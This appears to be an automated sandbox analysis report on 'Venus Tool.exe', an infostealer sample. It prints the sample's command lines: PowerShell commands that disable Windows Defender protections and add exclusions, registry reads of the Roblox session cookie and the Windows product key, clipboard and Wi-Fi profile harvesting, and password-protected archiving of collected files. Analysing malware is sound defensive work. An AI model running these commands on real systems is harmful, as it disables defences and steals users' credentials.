Analysis
- max time kernel: 138s
- max time network: 143s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21-06-2024 06:15
Behavioral task: behavioral1
- Sample: Venus Tool.exe
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: Venus Tool.exe
- Resource: win10v2004-20240226-en
General
- Target: Venus Tool.exe
- Size: 5.9MB
- MD5: 4238a832dbee926a3888e4ca18c9bff8
- SHA1: 3d1a7c8a85b33f7b71b6e3cd608c70b5fa19b07d
- SHA256: 88c11f9c63b5ab1f0e479c6d0fce5f9262496f7b76a918256181b677451909e3
- SHA512: 81fec5d57208a7f49dd3fed769841709e8ad890d277e1b6ee83b36c93608df18d8577bd7e61915d60f2c01aa3467ff5c36501a8fba4c85d9cbfdb48783663690
- SSDEEP: 98304:rN+nhjdRai65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFl9hikrK0ZM:rAnpIDOYjJlpZstQoS9Hf12VKX6biCGV
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  Processes (pid, process):
  3908 powershell.exe
  368 powershell.exe
- Executes dropped EXE (1 IoCs)
  Processes (pid, process):
  916 rar.exe
- Loads dropped DLL (17 IoCs)
  Processes (pid, process):
  4512 Venus Tool.exe (listed 17 times in the original table, one entry per IoC)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- YARA matches (resource, yara_rule):
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\python310.dll upx
  behavioral2/memory/4512-24-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_ctypes.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\libffi-7.dll upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\libssl-1_1.dll upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\unicodedata.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_ssl.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_sqlite3.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_socket.pyd upx
  behavioral2/memory/4512-48-0x00007FFA17B40000-0x00007FFA17B4F000-memory.dmp upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_queue.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_lzma.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_hashlib.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_bz2.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\_decimal.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\sqlite3.dll upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\select.pyd upx
  C:\Users\Admin\AppData\Local\Temp\_MEI35882\libcrypto-1_1.dll upx
  behavioral2/memory/4512-30-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx
  behavioral2/memory/4512-54-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmp upx
  behavioral2/memory/4512-56-0x00007FFA178D0000-0x00007FFA178E8000-memory.dmp upx
  behavioral2/memory/4512-58-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx
  behavioral2/memory/4512-60-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx
  behavioral2/memory/4512-62-0x00007FFA17010000-0x00007FFA17029000-memory.dmp upx
  behavioral2/memory/4512-64-0x00007FFA16FD0000-0x00007FFA16FDD000-memory.dmp upx
  behavioral2/memory/4512-66-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmp upx
  behavioral2/memory/4512-68-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx
  behavioral2/memory/4512-69-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmp upx
  behavioral2/memory/4512-73-0x00007FFA06000000-0x00007FFA06377000-memory.dmp upx
  behavioral2/memory/4512-72-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx
  behavioral2/memory/4512-76-0x00007FFA16C80000-0x00007FFA16C95000-memory.dmp upx
  behavioral2/memory/4512-78-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmp upx
  behavioral2/memory/4512-79-0x00007FFA16F90000-0x00007FFA16F9D000-memory.dmp upx
  behavioral2/memory/4512-81-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmp upx
  behavioral2/memory/4512-82-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx
  behavioral2/memory/4512-194-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx
  behavioral2/memory/4512-217-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx
  behavioral2/memory/4512-216-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx
  behavioral2/memory/4512-231-0x00007FFA17010000-0x00007FFA17029000-memory.dmp upx
  behavioral2/memory/4512-227-0x00007FFA06000000-0x00007FFA06377000-memory.dmp upx
  behavioral2/memory/4512-226-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmp upx
  behavioral2/memory/4512-222-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx
  behavioral2/memory/4512-221-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx
  behavioral2/memory/4512-230-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmp upx
  behavioral2/memory/4512-225-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmp upx
  behavioral2/memory/4512-297-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx
  behavioral2/memory/4512-303-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx
  behavioral2/memory/4512-298-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx
  behavioral2/memory/4512-330-0x00007FFA17010000-0x00007FFA17029000-memory.dmp upx
  behavioral2/memory/4512-338-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx
  behavioral2/memory/4512-343-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx
  behavioral2/memory/4512-342-0x00007FFA178D0000-0x00007FFA178E8000-memory.dmp upx
  behavioral2/memory/4512-341-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmp upx
  behavioral2/memory/4512-340-0x00007FFA17B40000-0x00007FFA17B4F000-memory.dmp upx
  behavioral2/memory/4512-339-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx
  behavioral2/memory/4512-337-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmp upx
  behavioral2/memory/4512-336-0x00007FFA16F90000-0x00007FFA16F9D000-memory.dmp upx
  behavioral2/memory/4512-335-0x00007FFA16C80000-0x00007FFA16C95000-memory.dmp upx
  behavioral2/memory/4512-333-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmp upx
  behavioral2/memory/4512-332-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmp upx
  behavioral2/memory/4512-331-0x00007FFA16FD0000-0x00007FFA16FDD000-memory.dmp upx
  behavioral2/memory/4512-329-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx
  behavioral2/memory/4512-334-0x00007FFA06000000-0x00007FFA06377000-memory.dmp upx
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Network (flow, ioc):
  21 ip-api.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Processes (description, ioc, process):
  Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
  Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
  Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
- Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine the installed video card.
- Enumerates processes with tasklist (1 TTPs, 3 IoCs)
  Processes (pid, process):
  1100 tasklist.exe
  4084 tasklist.exe
  3096 tasklist.exe
- Gathers system information (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
- Kills process with taskkill (7 IoCs)
  Processes (pid, process):
  3660 taskkill.exe
  1412 taskkill.exe
  1436 taskkill.exe
  1216 taskkill.exe
  4824 taskkill.exe
  4404 taskkill.exe
  2108 taskkill.exe
- Suspicious behavior: EnumeratesProcesses (22 IoCs)
  Processes (pid, process), in the order reported:
  3908 powershell.exe
  4436 powershell.exe
  3908 powershell.exe
  4436 powershell.exe
  368 powershell.exe
  368 powershell.exe
  368 powershell.exe
  3996 powershell.exe
  3996 powershell.exe
  3908 powershell.exe
  3908 powershell.exe
  4436 powershell.exe
  4436 powershell.exe
  3996 powershell.exe
  1096 powershell.exe
  1096 powershell.exe
  2580 powershell.exe
  2580 powershell.exe
  912 powershell.exe
  912 powershell.exe
  368 powershell.exe
  368 powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description, pid, process), in the order reported:
  Token: SeDebugPrivilege 3908 powershell.exe
  Token: SeDebugPrivilege 4436 powershell.exe
  Token: SeDebugPrivilege 1100 tasklist.exe
  Token: SeDebugPrivilege 368 powershell.exe
  Token: SeIncreaseQuotaPrivilege 1120 WMIC.exe
  Token: SeSecurityPrivilege 1120 WMIC.exe
  Token: SeTakeOwnershipPrivilege 1120 WMIC.exe
  Token: SeLoadDriverPrivilege 1120 WMIC.exe
  Token: SeSystemProfilePrivilege 1120 WMIC.exe
  Token: SeSystemtimePrivilege 1120 WMIC.exe
  Token: SeProfSingleProcessPrivilege 1120 WMIC.exe
  Token: SeIncBasePriorityPrivilege 1120 WMIC.exe
  Token: SeCreatePagefilePrivilege 1120 WMIC.exe
  Token: SeBackupPrivilege 1120 WMIC.exe
  Token: SeRestorePrivilege 1120 WMIC.exe
  Token: SeShutdownPrivilege 1120 WMIC.exe
  Token: SeDebugPrivilege 1120 WMIC.exe
  Token: SeSystemEnvironmentPrivilege 1120 WMIC.exe
  Token: SeRemoteShutdownPrivilege 1120 WMIC.exe
  Token: SeUndockPrivilege 1120 WMIC.exe
  Token: SeManageVolumePrivilege 1120 WMIC.exe
  Token: 33 1120 WMIC.exe
  Token: 34 1120 WMIC.exe
  Token: 35 1120 WMIC.exe
  Token: 36 1120 WMIC.exe
  Token: SeDebugPrivilege 4084 tasklist.exe
  Token: SeDebugPrivilege 3996 powershell.exe
  Token: SeDebugPrivilege 3096 tasklist.exe
  (the 21 rows for 1120 WMIC.exe above, SeIncreaseQuotaPrivilege through 36, are reported a second time at this point)
  Token: SeDebugPrivilege 4824 taskkill.exe
  Token: SeDebugPrivilege 4404 taskkill.exe
  Token: SeDebugPrivilege 2108 taskkill.exe
  Token: SeDebugPrivilege 3660 taskkill.exe
  Token: SeDebugPrivilege 1412 taskkill.exe
  Token: SeDebugPrivilege 1436 taskkill.exe
  Token: SeDebugPrivilege 1216 taskkill.exe
  Token: SeDebugPrivilege 1096 powershell.exe
  Token: SeDebugPrivilege 2580 powershell.exe
  Token: SeIncreaseQuotaPrivilege 2980 WMIC.exe
  Token: SeSecurityPrivilege 2980 WMIC.exe
  Token: SeTakeOwnershipPrivilege 2980 WMIC.exe
  Token: SeLoadDriverPrivilege 2980 WMIC.exe
  Token: SeSystemProfilePrivilege 2980 WMIC.exe
  Token: SeSystemtimePrivilege 2980 WMIC.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description, pid, process, target process); every write below is reported twice in the original table:
  PID 3588 wrote to memory of 4512: Venus Tool.exe -> Venus Tool.exe
  PID 4512 wrote to memory of 4640: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 4424: Venus Tool.exe -> cmd.exe
  PID 4640 wrote to memory of 3908: cmd.exe -> powershell.exe
  PID 4424 wrote to memory of 4436: cmd.exe -> powershell.exe
  PID 4512 wrote to memory of 4232: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 1056: Venus Tool.exe -> Conhost.exe
  PID 4512 wrote to memory of 436: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 2084: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 2716: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 4020: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 4632: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 4224: Venus Tool.exe -> cmd.exe
  PID 4512 wrote to memory of 1132: Venus Tool.exe -> cmd.exe
  PID 4232 wrote to memory of 1100: cmd.exe -> tasklist.exe
  PID 4224 wrote to memory of 368: cmd.exe -> powershell.exe
  PID 2716 wrote to memory of 5008: cmd.exe -> tree.com
  PID 4020 wrote to memory of 4060: cmd.exe -> netsh.exe
  PID 1056 wrote to memory of 1120: cmd.exe -> csc.exe
  PID 436 wrote to memory of 3996: cmd.exe -> powershell.exe
  PID 1132 wrote to memory of 4084: cmd.exe -> tasklist.exe
  PID 4632 wrote to memory of 4520: cmd.exe -> systeminfo.exe
  PID 2084 wrote to memory of 3096: cmd.exe -> tasklist.exe
  PID 4512 wrote to memory of 4568: Venus Tool.exe -> Conhost.exe
  PID 4568 wrote to memory of 4448: cmd.exe -> tree.com
  PID 4512 wrote to memory of 2716: Venus Tool.exe -> cmd.exe
  PID 2716 wrote to memory of 3228: cmd.exe -> cmd.exe
  PID 4512 wrote to memory of 3460: Venus Tool.exe -> cmd.exe
  PID 368 wrote to memory of 1120: powershell.exe -> csc.exe
  PID 3460 wrote to memory of 1088: cmd.exe -> tree.com
  PID 4512 wrote to memory of 332: Venus Tool.exe -> Conhost.exe
  PID 332 wrote to memory of 4020: cmd.exe -> tree.com
Processes
- [depth 1] C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe (PID 3588)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 2] C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe (PID 4512)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
- [depth 3] C:\Windows\system32\cmd.exe (PID 4640)
  Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe'"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3908)
  Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe'
  Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4424)
  Command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4436)
  Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4232)
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\tasklist.exe (PID 1100)
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 1056)
  Command line: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe (PID 1120)
  Command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
  Signatures: Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 436)
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3996)
  Command line: powershell Get-Clipboard
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 2084)
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\tasklist.exe (PID 3096)
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 2716)
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\tree.com (PID 5008)
  Command line: tree /A /F
- [depth 3] C:\Windows\system32\cmd.exe (PID 4020)
  Command line: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\netsh.exe (PID 4060)
  Command line: netsh wlan show profile
  Signatures: Event Triggered Execution: Netsh Helper DLL
- [depth 3] C:\Windows\system32\cmd.exe (PID 4632)
  Command line: C:\Windows\system32\cmd.exe /c "systeminfo"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\systeminfo.exe (PID 4520)
  Command line: systeminfo
  Signatures: Gathers system information
- [depth 3] C:\Windows\system32\cmd.exe (PID 4224)
  Command line: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 368)
  Command line: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
  Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- [depth 5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1120)
  Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n4htjhpf\n4htjhpf.cmdline"
- [depth 6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 4788)
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF2.tmp" "c:\Users\Admin\AppData\Local\Temp\n4htjhpf\CSC1EA102E094254315AA7332DEBC3018E2.TMP"
- [depth 3] C:\Windows\system32\cmd.exe (PID 1132)
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\tasklist.exe (PID 4084)
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4568)
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\tree.com (PID 4448)
  Command line: tree /A /F
- [depth 3] C:\Windows\system32\cmd.exe (PID 2716)
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\tree.com (PID 3228)
  Command line: tree /A /F
- [depth 3] C:\Windows\system32\cmd.exe (PID 3460)
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\System32\Conhost.exe (PID 1056)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [depth 4] C:\Windows\system32\tree.com (PID 1088)
  Command line: tree /A /F
- [depth 3] C:\Windows\system32\cmd.exe (PID 332)
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  Signatures: Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\tree.com (PID 4020)
  Command line: tree /A /F
- [depth 3] C:\Windows\system32\cmd.exe (PID 2580)
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
- [depth 4] C:\Windows\System32\Conhost.exe (PID 4568)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [depth 4] C:\Windows\system32\tree.com (PID 768)
  Command line: tree /A /F
- [depth 3] C:\Windows\system32\cmd.exe (PID 1596)
  Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"
- [depth 4] C:\Windows\System32\Conhost.exe (PID 332)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [depth 4] C:\Windows\system32\taskkill.exe (PID 4824)
  Command line: taskkill /F /PID 2032
  Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 1884)
  Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2304"
- [depth 4] C:\Windows\system32\taskkill.exe (PID 4404)
  Command line: taskkill /F /PID 2304
  Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 3228)
  Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3988"
- [depth 4] C:\Windows\system32\taskkill.exe (PID 2108)
  Command line: taskkill /F /PID 3988
  Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4496)
  Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2548"
- [depth 4] C:\Windows\system32\taskkill.exe (PID 3660)
  Command line: taskkill /F /PID 2548
  Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4788)
  Command line: C:\Windows\system32\cmd.exe /c "getmac"
- [depth 4] C:\Windows\system32\getmac.exe (PID 4516)
  Command line: getmac
- [depth 3] C:\Windows\system32\cmd.exe (PID 4532)
  Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2092"
- [depth 4] C:\Windows\system32\taskkill.exe (PID 1412)
  Command line: taskkill /F /PID 2092
  Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4092)
  Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2072"
- [depth 4] C:\Windows\system32\taskkill.exe (PID 1436)
  Command line: taskkill /F /PID 2072
  Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 3396)
  Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1980"
- [depth 4] C:\Windows\system32\taskkill.exe (PID 1216)
  Command line: taskkill /F /PID 1980
  Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 3628)
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1096)
  Command line: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4528)
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2580)
  Command line: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 3740)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\W3W1y.zip" *"
- [depth 4] C:\Users\Admin\AppData\Local\Temp\_MEI35882\rar.exe (PID 916)
  Command line: C:\Users\Admin\AppData\Local\Temp\_MEI35882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\W3W1y.zip" *
  Signatures: Executes dropped EXE
- [depth 3] C:\Windows\system32\cmd.exe (PID 4548)
  Command line: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe (PID 2980)
  Command line: wmic os get Caption
  Signatures: Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\cmd.exe (PID 4812)
  Command line: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe (PID 3908)
  Command line: wmic computersystem get totalphysicalmemory
- [depth 3] C:\Windows\system32\cmd.exe (PID 3604)
  Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe (PID 3180)
  Command line: wmic csproduct get uuid
- [depth 3] C:\Windows\system32\cmd.exe (PID 1484)
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
- [depth 4] C:\Windows\System32\Conhost.exe (PID 4516)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 912)
  Command line: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  Signatures: Suspicious behavior: EnumeratesProcesses
- [depth 3] C:\Windows\system32\cmd.exe (PID 1532)
  Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe (PID 4136)
  Command line: wmic path win32_VideoController get name
  Signatures: Detects videocard installed
- [depth 3] C:\Windows\system32\cmd.exe (PID 548)
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 368)
  Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
  Signatures: Suspicious behavior: EnumeratesProcesses
- [depth 1] C:\Windows\system32\svchost.exe (PID 4788)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 8740e7db6a0d290c198447b1f16d5281
  SHA1: ab54460bb918f4af8a651317c8b53a8f6bfb70cd
  SHA256: f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5
  SHA512: d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 59d97011e091004eaffb9816aa0b9abd
  SHA1: 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
  SHA256: 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
  SHA512: d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 3a6bad9528f8e23fb5c77fbd81fa28e8
  SHA1: f127317c3bc6407f536c0f0600dcbcf1aabfba36
  SHA256: 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
